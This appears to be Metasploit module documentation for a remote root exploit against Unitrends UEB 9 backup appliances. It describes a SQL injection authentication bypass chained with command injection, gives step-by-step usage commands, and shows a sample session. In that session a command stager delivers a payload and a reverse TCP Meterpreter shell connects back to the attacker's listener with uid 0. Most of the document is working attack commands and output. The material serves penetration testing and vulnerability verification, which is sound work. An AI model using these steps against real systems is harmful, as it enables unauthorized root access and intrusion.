## Vulnerable Application

Unitrends UEB 9 http api/storage remote root

This exploit leverages a SQL injection (SQLi) vulnerability for authentication bypass, together with command injection for subsequent root RCE.

## Verification Steps

1. `use exploit/linux/http/ueb9_api_storage`
2. `set lhost [IP]`
3. `set rhost [IP]`
4. `exploit`
5. A meterpreter session should have been opened successfully.

## Scenarios

### UEB 9.1 on CentOS 6.5

```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress -  19.83% done (164/827 bytes)
[*] Command Stager progress -  39.30% done (325/827 bytes)
[*] Command Stager progress -  57.44% done (475/827 bytes)
[*] Command Stager progress -  75.45% done (624/827 bytes)
[*] Command Stager progress -  93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```